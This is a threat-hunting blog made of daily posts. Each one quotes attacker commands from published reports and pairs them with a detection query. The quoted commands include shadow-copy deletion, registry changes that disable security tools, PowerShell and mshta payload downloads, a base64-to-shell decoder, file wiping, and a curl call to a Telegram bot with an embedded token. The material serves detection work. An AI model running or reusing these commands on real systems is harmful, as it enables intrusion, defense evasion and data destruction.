Know Your Adversary

Hello everyone! No, no more detection and hunting tips today! And yes, it's the last post for the Zeltser challenge! It was a definitely a hard one, but still it was fun! Thank you Dave for motivating me to start it! Thanks everyone who reacted to the posts and wrote kind words - it helped me a lot to finish it! It doesn't mean I stop posting! But I won't do it every day! Still, if I see something interesting - I share it with you! Thank you for reading the blog and see you next year!

Hello everyone! Today we'll look at another example of a very common technique - Remote Access Tools: Remote Desktop Software (T1219.002) . Ransomware gangs have lots of such tools in their arsenal. For example, Power Admin -  legitimate tool that provides functionality to monitor servers and applications, as well as file access auditing.  Of course, it may be a good target for detection and hunting, for example: event_type: "processcreatewin" AND proc_file_productname: "pa server monitor" See you tomorrow!

Hello everyone! We often talk (and see, of course) LOLBAS. So, let's look at another one, which became really popular among adversaries this year. So, our today's example - Arcane Werewolf . The adversary leverages conhost.exe to run the dropper: conhost.exe C:\Users\<USER>\AppData\Local\Temp\icon2.png One more example - running Loki 2.0 loader: conhost.exe %TEMP%\chrome_proxy.pdf As you can see, the threat actors quite suspicious file exensions, so we can use it to build a query: event_type: "processcreatewin" AND proc_file_path: "conhost.exe" AND cmdline: (*png OR *pdf) See you tomorrow!

Hello everyone! Today we'll talk about how ransomware gangs abuse legitimate software for  File and Directory Discovery (T1083) . And our example for today's post - NightSpire . Anong other tools, the gang leveraged Everything - a legitimate tool that enables an adversary to index files and get a deeper understanding of data available on the compromised system. So, this tool, especially if it's not widely used internaly, may be a good target for hunting: event_type: "processcreatewin" AND proc_file_originalfilename: "everything.exe" See you tomorrow!

Hello everyone! It's not a secret that ransomware gangs often interact with Volume Shadow Copy Service to  Inhibit System Recovery (T1490) . In most cases it's not a good target for hunting as adversaries abuse it on the latest stages of attack lifecycle. At the same time, they may use scripting to manipulate it, and it may be you last chance to detect malicious activity. For example, Qilin executed the following commands: cmd /C net start vss cmd /C wmic service where name='vss' call ChangeStartMode Manual cmd /C vssadmin.exe Delete Shadows /all /quiet cmd /C net stop vss cmd /C wmic service where name='vss' call ChangeStartMode Disabled I'm sure you have detections for deletion, but what about manipulating the service? So, it may be a good idea to look for abusing wmic.exe for VSS manipulation: event_type: "processcreatewin" AND proc_file_path: "wmic.exe" AND cmdline: "vss" See you tomorrow!

Hello everyone! Adversaries may use Windows registry to solve various tasks. Some are very common, while others are not. Let's look at one of them! Today we'll look at  Valley RAT . According to this report , it uses the following registry key to store downloaded plugins: HKCU\Console\0\d33f351a4aeea5e608853d1a56661059 So, from threat hunting perspective, we can look for suspicious registry modification events related to  HKCU\Console\ : event_type: "registryvaluesetwin" AND reg_key_path: "hkey_current_user\\console" See you tomorrow!

Hello everyone! As you know, adversaries may delete malicious files and tools for defense evasion. But can we use it for threat hunting? Let's find out! We need an example, of course. Let's look at Amadey loader described in this report . The adversary leveraged multiple commands to delete existing malicious file and move a copy to a different location: cmd.exe /k "taskkill /f /im "Yfgfwb.exe" && timeout 1 && del "Yfgfwb.exe" && ren 07072f Yfgfwb.exe && C:\Users\UserName\Appdata\Local\Temp\067640a009\Yfgfwb.exe && Exit For example, we can look for sequences of suspicious commands, like taskkill and del : event_type: "processcreatewin" AND proc_file_path: "cmd.exe" AND cmdline: ("taskkill" AND "del") See you tomorrow!

Hello everyone! It's time to look at another interesting RMM abused by threat actors for redundant access, and check if your detections cover it. According to this report , the adversary dropped a renamed copy  GotoHTTP to the compromised system. It's interesting that the threat actors just need to install this RMM on the system they want to control, and to manipulate it they need just a web-browser! So, you can look for related network connections: event_type: "dnsreqwin" AND dns_rname: "gotohttp.com" And for binary itself, of course: event_type: "processcreatewin" AND proc_file_productname: "gotohttp" See you tomorrow!

Hello everyone! Today we'll look at an example provided by the colleagues from Zscaler in their recent research. And yes, it's legitimate services abuse one more time! So, according to the research , Zscaler Threat Hunting observed a localized spike in traffic to the URL shortener surl[.]li . This service was used by the adversary (SideWinder) to redirect the victim to a phishing page with a link to  gofile[.]io , which was used to host ZIP archives with a bunch of files, including malicious. So, here we have a real-world example of how defenders leveraged the knowledge of legitimate web-services abused by adversaries to for a hypothesis and find undetected malicious activity. You can do the same: event_type: "dnsreqwin" AND dns_rname: ("surl.li" OR "gofile.io") See you tomorrow!

Hello everyone! You may be a bit tired of various legitimate web-services abused by adversaries, but such services are always good targets for hunting, so let's look at another example. This time adversaries leveraged  Archive[.]org to store a malicous PNG files, for example: hxxp://dn710107.ca.archive[.]org/0/items/msi-pro-with-b-64_20251208_1511/MSI_PRO_with_b64[.]png Such files contained a steganographically embedded base64-encoded .NET assembly hidden at the end of the file. Also, to download and execute it, the adversary used PowerShell. Knowing all of this, we can builad a hunting query: event_type: "dnsreqwin" AND dns_rname: "archive.org" AND proc_file_path: "powershell.exe" See you tomorrow!

Hello everyone! If we're talking about ransomware gangs, we're always talking about  Command and Scripting Interpreter: Hypervisor CLI (T1059.012) . Yes, ransomware gangs love it! Let's look at RansomHouse , and focus on MrAgent. To obtain the MAC address, it runs the following command: esxcli --formatter=csv network nic list It runs the following command to collect information on the IP-address: esxcli --formatter=csv network nic list It also abuses ESXCLI to disable the firewall: esxcli network firewall set --enabled false So, for example, we can hunt for suspicious commands related to managing of host networking: event_type: "processcreatenix" AND cmdline: ("esxcli" AND "network") See you tomorrow!

Hello everyone! We often see how adversares make console windows hidden. But they can also just make them to appear off-screen! Let's look at an example! This time we'll look at Cloud Atlas (or Cloud Werewolf as we track it). The adversary modified the following registry keys to hide console windows: "HKCU\Console\%SystemRoot%_System32_WindowsPowerShell_v1.0_powershell.exe"::"WindowPosition"::5122 "HKCU\UConsole\taskeng.exe"::"WindowPosition"::538126692 Quite interesting, right? And we can look for suspicious registry modification events: event_type: "registryvaluesetwin" AND reg_key_path: "windowposition" See you tomorrow!

Hello everyone! Let's look at another interesting example of how adversaries abuse legitimate infrastructure for C2. This time it's Fastly. Kaspersky revealed  another  ForumTroll campaign. This time the adversary leveraged  Tuoni - a commercial red teaming framework. At the same time, the threat actors used the same service for C2 as in previous campaigns - Fastly. What does it mean? We can use it for our threat hunting missions! event_type: "dnsreqwin" AND dns_rname: "fastly.net" See you tomorrow!

Hello everyone! Today we'll look at a few more examples of how adversaries intentionally weaken Windows security posture to assist persistence and lateral movement. According to the report , Ink Dragon modified various Windows registry settings to downgrade security controls: enabled restricted admin ( DisableRestrictedAdmin ), disabled remote token filtering ( LocalAccountTokenFilterPolicy ), enabled the DSRM (Directory Services Restore Mode) Administrator account ( DsrmAdminLogonBehavior ), and removed Process Protection Level safeguards ( RunAsPPL ). These behaviors are definitely good target for hunting, for example: event_type: "registryvaluesetwin" AND reg_key_path: "localaccounttokenfilterpolicy" AND reg_value_data: "0x00000001" See you tomorrow!

Hello everyone! Let's look at another curious case of how adversaries abuse legitimate web services to solve various tasks. And this time we'll look at how they use Telegram for payload execution notification. Our example for today -  DeerStealer . As you can see the threat actors leveraged curl.exe to get a notification that the payload is executed: C:\WINDOWS\system32\cmd.exe /d /s /c "curl -s -X POST https://api.telegram.org/bot7972762095:AAE_DZEcCA4tkMpVK-peSGL6x4j4GMgl-3g/sendMessage -d chat_id=8093548175 -d text="undefined - executable запущен"" Similar activity may be legitimate - administrators may use Telegram to get notifications if anything goes wrong, but still it's a good target for threat hunting: event_type: "processcreatewin" AND proc_file_path: "curl.exe" AND cmdline: *telegram* See you tomorrow!

Hello everyone! In some cases adversaries do not need a dedicated C2 infrastructure. They can use the following technique:  Web Service (T1102) . UNC5174 , for example, leveraged the Discord API as their C2 channel. This approach enabled the adversary to mimic legitimate traffic patterns and evade existing security policies. Unfortunately, Discord-related domains may be resolved by various legitimate software, but still it's a great target for hunting as it's not the first time threat actors abuse it: event_type: ("dnsreqwin" OR "dnsreqnix") AND dns_rname: ("discord.com" OR "discord.gg") AND NOT proc_file_path: *discord* See you tomorrow!

Hello everyone! DLL Side-Loading becomes more and more popular among threat actors, who distribute commodity malware, so today we'll look at Hijack Execution Flow: DLL (T1574.001) . The adversary leveraged  a renamed version of FoxitPDFReader.exe to load a malicious  msimg32.dll , which starts a chain leading to PureRAT payload.  The threat actors used various names for the legitimate executable, for example: Authentic_Job_Application_Form.exe Project_Salary_Commission_and Benefits.exe Compensation, Incentives, and Benefits for project participation.exe Compensation_Benefits_Commission.exe Digital_Marketing_Proficiency_Test.exe Salary, Incentives, and Benefits for the Project.exe Marketing_Performance_Test_Assignment.exe Commission_Structure.exe Salary_Incentives_and_Benefits_for_the_Project.exe Pay_Benefits_Commission_Plan.exe So, one of hunting opportunities for such activity is to look for  FoxitPDFReader.exe  with uncommon names: event_type: "processcreatew...

Hello everyone! Adversaries may hide malicious content everywhere, including absolutely legitimate files, so today we'll look at the following technique -  Obfuscated Files or Information: Steganography (T1027.003) . In some cases threat actors may use quite common malware, but still use some interesting techniques. Just like in this case . The adversary leveraged malicious LNK files to run a command, which would extract and execute a malicious script from a subtitle file: cmd.exe /c type Part2.subtitles.srt | more | findstr /n "^" | findstr "100: 101: 102: 103:" | for /f "tokens=1,* delims=:" %a in ('more') do cmd /c %b Interesting, right? We can hunt for similar activity: event_type: "processcreatewin" AND proc_file_path: "cmd.exe" AND cmdline: ("type" AND "findstr" AND *.srt) See you tomorrow!

Hello everyone! We talked about Modify Registry (T1112) a few times already, but I spotted a few more interesting procedures, so let's have a look. Our example for today is  VolkLocker . It has a few interesting behaviors related to registry modification. It disables Task Manager: reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f Disables Registry Editor: reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 1 /f reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 1 /f Disables Windows Command Shell: reg add "HKCU\Software\Policies\Microsoft\Windows\System" /v DisableCMD /t REG_DWORD /d 2 /f reg add "HKLM\SOFTWARE\Policies\Microsoft\Windo...

Hello everyone! Adversaries often use compromised credentials, but in some cases they can create new accounts. And in some cases they are quite unique, so we can use it for detection and hunting. As always, we need some examples. Let's look into this report . The adversary created new administrator accounts with the following names: backupadmin , admin_gpo and  lapsadmin1 . For example: cmd.exe /c net user backupadmin abcd1234 Suspicious user creation events may be great targets for hunting, so make sure you document it not only for attribution and clustering, but also for detection: event_type: "usercreatewin" AND usr_tgt_name: ("backupadmin" OR "admin_gpo" OR "lapsadmin1") See you tomorrow!

Hello everyone! In many cases adversaries remove artifacts from compromised systems, so today we'll look at a few examples of  Indicator Removal: File Deletion (T1070.004) . And our example for today -  01flip ransomware . It has both Windows and Linux variants. Windows variant removes itself using the following command: ping 127.0.0.7 -n 5 > Nul & fsutil file setZeroData offset=0 length=4194303 ${self_name} > Nul & Del /f /q ${self_name} As you can see, it abuses fsutil to wipe the file. We can look for similar activity: event_type: "processcreatewin" AND proc_file_path: "fsutil.exe" AND cmdline: ("file" AND "setzerodata") Linux variant runs the following command: sleep 5 && dd if=/dev/urandom of=${self_name} bs=1M count=4 > /dev/null 2>&1 && rm ${self_name} > /dev/null 2>&1 Here the adversary abuses dd , and it's another hunting oportunity: event_type: "processcreatenix" AND p...

Hello everyone! We talked about it a few times already, but I've spotted another forensic tool in adversary's arsenal today. And yes, it's another example of how threat actors can obtain an LSASS dump. This time, according to this post , they used  MemProcFS to mount a dump of compromised system's memory: memprocfs.exe -device dump.dmp If you are not doing incident response, for example, MemProcFS execution is a quite suspicious event, so it's worth a query: event_type: "processcreatewin" AND proc_file_originalfilename: "memprocfs.exe" See you tomorrow!

Hello everyone! Today we'll look at another example of how adversaries abuse legitimate Windows executables to evade defenses. This time it's  SystemSettingsAdminFlows.exe . According to this report , DeadLock leveraged this utility to disable various features of Windows Defender: SystemSettingsAdminFlows.exe Defender RTP 1  SystemSettingsAdminFlows.exe Defender SpynetReporting 0  SystemSettingsAdminFlows.exe Defender SubmitSamplesConsent 0  SystemSettingsAdminFlows.exe Defender DisableEnhancedNotifications 1 The commands disable Real-Time Protection (RTP) and cloud-based protections, stops the machine from sending threat reports to Microsoft, and prevent Windows Defender from automatically submitting suspicious files for analysis. Worth a query, isn't it? event_type: "processcreatewin" AND proc_file_path: "systemsettingsadminflows.exe" AND cmdline: "defender" See you tomorrow!

Hello everyone! It's Monday, so let's look at a classic (at least in my opinion) target for threat hunting -  System Binary Proxy Execution: Mshta (T1218.005) . I've spotted it again looking through the report on activity cluster we track as Lone Wolf . The adversary leveraged malicious LNK files to deploy Cobalt Strike beacon. The LNK, for example, runs the following command: powershell.exe -WindowStyle hidden -ExecutionPolicy Bypass -Command "Start-Process mshta -ArgumentList 'hxxps://iplogger[.]cn/forensicsas.png'" As you can see, here mshta.exe is used to access a link, which redirects to a malicious HTA file. So, for example, we can search for mshta.exe accessing suspicious links: event_type: "processcreatewin" AND proc_file_path: "mshta.exe" AND cmdline: *http* See you tomorrow!

Hello everyone! We already looked at lots of legitimate tools, which are used by adversaries to solve various tasks. It's time for another one! It's commonly used for  System Services: Service Execution (T1569.002) . I'm talking about the Non-sucking Service Manager (NSSM) . It's used by various threat actors. For example, if we look into the report on Red Wolf , we can see that it was used to create two distinct Windows service entries pointing to the same Chisel binary ( MSAProfileNotificationHandler.exe ). And yes, it's another great target for hunting: event_type: "processcreatewin" AND proc_file_productname: "nssm" See you tomorrow!

Hello everyone! I've shared some notable examples of Modify Registry (T1112) already. It's time for a few more interesting examples. Sophos has published a great report on Red Wolf's recent activities. According to the report, the adversary modified the following registry keys: HKLM\SYSTEM\CurrentControlSet\Control\CI\Config /v VulnerableDriverBlocklistEnable /t REG_DWORD /d 0x0 /f HKLM\\SYSTEM\\CurrentControlSet\\Control\\DeviceGuard\\Scenarios\\HypervisorEnforcedCodeIntegrity /v Enabled /t REG_DWORD /d 0x0 /f The first one disables vulnerable drivers blocklist, the second - Hypervisor-Enforced Code Integrity. Both are good targets for hunting, so: event_type: "registryvaluesetwin" AND reg_key_path: ("VulnerableDriverBlocklistEnable" OR "HypervisorEnforcedCodeIntegrity") AND reg_value_data: "0x00000000" See you tomorrow!

Hello everyone! In some cases adversaries still use malicious documents to deliver malware. Let's look at a recent example. It's MuddyWater again. The adversary leveraged phishing emails to deliver malicious Microsoft Word documents. The document dropped UDPGangster to  C:\Users\Public\ui.txt and executed it. Here we have winword.exe spawning a suspicious file from %PUBLIC% folder. Let's transform it into a query: event_type: "processcreatewin" AND proc_p_file_path: "winword.exe" AND proc_file_path: "public" See you tomorrow!

Hello everyone! If you tired of common persistence mechanisms (just like me), this one is for you. Not a new one, but I don't see it very often. So, according to the report , the adversary leveraged MuddyViper. The malware configures its installation directory as a Windows Startup folder, by setting the following registry values to %APPDATALOCAL%\Microsoft\Windows\PPBCompatCache\ManagerCache : HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Startup HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Startup Worth building a hunt, right? event_type: "registryvaluesetwin" AND reg_key_path: "shell folders\\startup" AND NOT reg_value_data: "programs\\startup" See you tomorrow!

Hello everyone! Adversaries love PowerShell as they can use it to solve hundreds of tasks. Let's look at another curious example. According to the report , the adversary leveraged PowerShell to disable Plug and Play devices, specificly a keyboard and a mouse: Get-PnpDevice -FriendlyName 'HID Keyboard Device' | %{Disable-PnpDevice -InputObject $_ -ErrorAction SilentlyContinue -Confirm:$false} Get-PnpDevice -Class Keyboard | %{Disable-PnpDevice -InputObject $_ -ErrorAction SilentlyContinue -Confirm:$false} Get-PnpDevice -Class Mouse | %{Disable-PnpDevice -InputObject $_ -ErrorAction SilentlyContinue -Confirm:$false} Write-Host "Devices disabled." Not a very common event, so if you collect ScriptBlock, you have another detection or hunting opportunity: event_type: "scriptexecutionwin" AND script_text: "Disable-PnpDevice" See you tomorrow!

Hello everyone! I already mentioned that threat actors started to use phishing emails to attack Linux systems. No, not globally. At least, for now. So, as you know, APT36 usually use malicious .desktop files, and hides malicious logic inside encoded data, for example: sh -c "echo [base64_encoded_data] | base64 -d | sh" Yes, we can see similar commands executed legitimately, and yes, it's another hunting opportunity: event_type: "processcreatenix" AND cmdline: ("echo" AND "base64" AND "d" AND "sh") See you tomorrow!

Hello everyone! Today we'll look at another example of Ingress Tool Transfer (T1105) . And this time adversaries used Netlify to store malicious files. According to the report , Fog ransomeware affiliates used PowerShell to download malicious files, for example: iwr -uri 'hxxps://hilarious-trifle-d9182e.netlify[.]app/ktool.exe' -outfile $temppath As you can see, they used Netlify, a legitimate platform for building, deploying, and scaling web apps, to store those files. To tell the truth, it's not the first time I see adversaries use it, so it's another good target for hunting: event_type: "dnsreqwin" AND dns_rname: "netlify.app" See you tomorrow!